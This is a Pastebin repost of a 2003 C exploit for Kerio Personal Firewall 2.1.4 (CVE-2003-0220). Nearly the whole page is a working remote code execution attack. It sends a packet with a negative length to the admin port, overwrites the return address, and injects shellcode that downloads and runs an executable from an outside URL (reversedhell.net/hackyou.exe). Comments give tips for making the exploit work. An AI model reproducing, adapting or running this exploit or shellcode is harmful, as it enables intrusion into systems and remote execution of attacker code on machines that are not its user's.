Advertisement
FlyFar

Kerio Personal Firewall 2.1.4 - Remote Code Execution - CVE-2003-0220

Jan 24th, 2024
721
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 8.39 KB | Cybersecurity | 0 0
  1. /*
  2.  * Kerio Personal Firewall v2.1.4 remote code execution exploit
  3.  * Tested on Windows XP with SP1
  4.  *
  5.  * In order to exploit, for ease of mind, set the firewall to permit all traffic, or allow
  6.  * a connection to port 44334 from your testing unix shell ip.
  7.  *
  8.  * It is also possible to use UDP instead of TCP
  9.  *
  10.  * It works out very well, if not, hit a few times with a ret addr of 0x41414141 to make it crash
  11.  * AT THAT addr. Then use the original one, it will work. The one I used points to a 'call esp'
  12.  * inside the RPCRT4.DLL.
  13.  */
  14.  
  15. #include <stdio.h>
  16. #include <stdlib.h>
  17. #include <unistd.h>
  18. #include <errno.h>
  19. #include <string.h>
  20. #include <netdb.h>
  21. #include <sys/types.h>
  22. #include <netinet/in.h>
  23. #include <sys/socket.h>
  24.  
  25. #define PORT 44334 // the port client will be connecting to, default Kerio admin port
  26. #define retpos 5272
  27. #define MAXDATASIZE 5277 // max number of bytes we can get, also size of buffer
  28.  
  29. // global vars
  30.  
  31. struct sockaddr_in their_addr; // connector's address information
  32. char buf[MAXDATASIZE];
  33. int numbytes;
  34.  
  35. unsigned char shellcode[] =
  36. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  37.  
  38. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  39.  
  40. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  41.   "\xEB\x30\x5F\xFC\x8B\xF7\x80"
  42.  
  43. "\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB2\x04\xC1"
  44.  
  45. "\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB2\x7C\x8B"
  46.  
  47. "\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF8\x8B\x40"
  48.  
  49. "\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0C\x03\x7D"
  50.  
  51. "\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8B\xF8\x33"
  52.  
  53. "\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7A\x03\x80"
  54.  
  55. "\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x51\xF3\xA6"
  56.  
  57. "\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC1\xE0\x02"
  58.  
  59. "\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x40\x3C\x03"
  60.  
  61. "\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF0\xAD\x03"
  62.  
  63. "\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xFC\x8D\x76"
  64.  
  65. "\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5E\x74\x06"
  66.  
  67. "\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0E\xEB\x02"
  68.  
  69. "\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5D\xFC\x8D"
  70.  
  71. "\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x45\xE4\xFC"
  72.  
  73. "\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x43\xE2\xE1"
  74.  
  75. "\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x53\x51\x53"
  76.  
  77. "\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x43\xEB\xF9"
  78.  
  79. "\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD4\xFF\xD0"
  80.  
  81. "\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xFF\xD0\x8D"
  82.  
  83. "\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x52\x8D\x7B"
  84.  
  85. "\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB6\x1F\xC1"
  86.  
  87. "\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8B\x45\xB4"
  88.  
  89. "\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xDC\xFF\xD0"
  90.  
  91. "\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8B\x55\xA4"
  92.  
  93. "\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xCC\xFF\xD0"
  94.  
  95. "\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6F\x64\x75"
  96.  
  97. "\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2E\x64"
  98.  
  99. "\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08\x4C\x6F"
  100.  
  101. "\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x74\x08\x5F"
  102.  
  103. "\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x08\x5F"
  104.  
  105. "\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x69\x74\x50"
  106.  
  107. "\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2E\x64\x6C\x6C\x08\x49"
  108.  
  109. "\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72\x6E\x65"
  110.  
  111. "\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x52\x65"
  112.  
  113. "\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F\x73\x65"
  114.  
  115. "\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2E\x65\x78\x65\x08"
  116.   "http://reversedhell.net/hackyou.exe"
  117.   "\x08\x01"; // download + exec from the net ; donno who wrote this sc
  118.  
  119.   //change the url to whatever, this one pops up an innofensive message box
  120.  
  121. // end of global vars
  122.  
  123. int suck(int sock,int n)
  124. {
  125.     int i=0,j=0,k,a=0,b=0,c=0,d=0;
  126.  
  127.     while (i<n)
  128.     {
  129.  
  130.         if ((numbytes=recv(sock, buf, n, 0)) == -1) {
  131.                 perror("recv");
  132.                 exit(1);
  133.            }
  134.  
  135.             if (j) i+=(numbytes-1); // ya i know i know :D
  136.        
  137.             else i+=numbytes;
  138.  
  139.             for (k=0;k<numbytes;k++) {
  140.                             if (k % 10 == 0) fprintf(stderr,"\n");
  141.                             if (buf[k]==0) fprintf(stderr,"    0 ");
  142.                             else fprintf(stderr," %4.0d ",buf[k]);
  143.                              } 
  144.  
  145.  
  146.             fprintf(stderr,"    * ");
  147.             j++;
  148.             d=buf[numbytes];
  149.             c=buf[numbytes-1];
  150.             b=buf[numbytes-2];
  151.             a=buf[numbytes-3];
  152.             if ((i>200) && (a==0x1) && (b==0x0) && (c==0x1) && (d==0x0)) break;
  153.         }
  154.         fprintf(stderr,"\n");
  155.         return i;
  156. }
  157.  
  158.  
  159.     int main(int argc, char *argv[])
  160.     {
  161.         int sockfd, i,j;  
  162.         struct hostent *he;
  163.  
  164.         if (argc != 2) {
  165.             fprintf(stderr,"usage: ./%s hostname\n",argv[0]);
  166.             exit(1);
  167.         }
  168.  
  169.         if ((he=gethostbyname(argv[1])) == NULL) {  // get the host info
  170.             perror("gethostbyname");
  171.             exit(1);
  172.         }
  173.  
  174.         if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { // prepare a socket for connecting
  175.             perror("socket");
  176.             exit(1);
  177.         }
  178.  
  179.         their_addr.sin_family = AF_INET;    // host byte order
  180.         their_addr.sin_port = htons(PORT);  // short, network byte order
  181.         their_addr.sin_addr = *((struct in_addr *)he->h_addr);
  182.         memset(&(their_addr.sin_zero), '\0', 8);  // zero the rest of the struct
  183.  
  184.         if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1) {
  185.             perror("connect");
  186.             exit(1);
  187.         }
  188.  
  189.        
  190.         fprintf(stderr,"shell len = %d\n",strlen(shellcode));
  191.      fprintf(stderr,"Connected to firewall.\n");
  192.      memset(buf,0x0,sizeof(buf));
  193.      fprintf(stderr,"Sucking buffer..\n");
  194.         suck(sockfd,266);
  195.         fprintf(stderr,"\nBuffer ***** by black hole..\n");
  196.          memset(buf,0x0,sizeof(buf));
  197.          fprintf(stderr,"-------------------------------------------------\n");
  198.          fprintf(stderr,"                 - BANNER -   \n");
  199.          fprintf(stderr,"-------------------------------------------------\n");
  200.          sleep(1);
  201.      fprintf(stderr,"coded by Burebista (aanton@reversedhell.net)\n");
  202.      fprintf(stderr,"           released on - 5 Apr 2003 -\n");
  203.      
  204.      sleep(2);
  205.          fprintf(stderr,"-------------------------------------------------\n");
  206.      memset(buf,0x90,MAXDATASIZE); // set nops all over
  207.      
  208.      // prepares call up to beginning of buffer 32 bit=5 bytes
  209.      buf[MAXDATASIZE-1]='\xff'; //
  210.      buf[MAXDATASIZE-2]='\xff'; // call -1150
  211.      buf[MAXDATASIZE-3]='\xee'; //
  212.      buf[MAXDATASIZE-4]='\xab'; //
  213.      buf[MAXDATASIZE-5]='\xe8'; //
  214.                            
  215.      j=0;
  216.                    // insert the shellcode in buf at 900
  217.      for (i=900;j<strlen(shellcode);i++) buf[i]=shellcode[j++];
  218.      
  219.      // prepares the new return address (on XPSP1 it is CALL ESP in RPCRT4.DLL)
  220.    
  221.      buf[retpos-1]='\x78';
  222.      buf[retpos-2]='\x07';
  223.      buf[retpos-3]='\x06';
  224.      buf[retpos-4]='\x90';
  225.      
  226.      // this prepares packet header with negative length
  227.      
  228.      buf[0]=0;
  229.      buf[1]=0;
  230.      buf[2]=0x14;
  231.      buf[3]=0xffffff9c; // negative, -100. firewall will prepare
  232.                               // buf of that size. signed integers hit again
  233.  
  234.      
  235.      if ((send(sockfd, buf,sizeof(buf),0)) == -1 ) { // PASARAN!
  236.         perror("send");
  237.         exit(1);
  238.      }
  239.      fprintf(stderr,"..pasaran...\n");
  240.      fprintf(stderr,":D Done!\n");
  241.      
  242.         close(sockfd);
  243.        }
  244.  
  245.  
  246. // milw0rm.com [2003-05-08]
  247.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement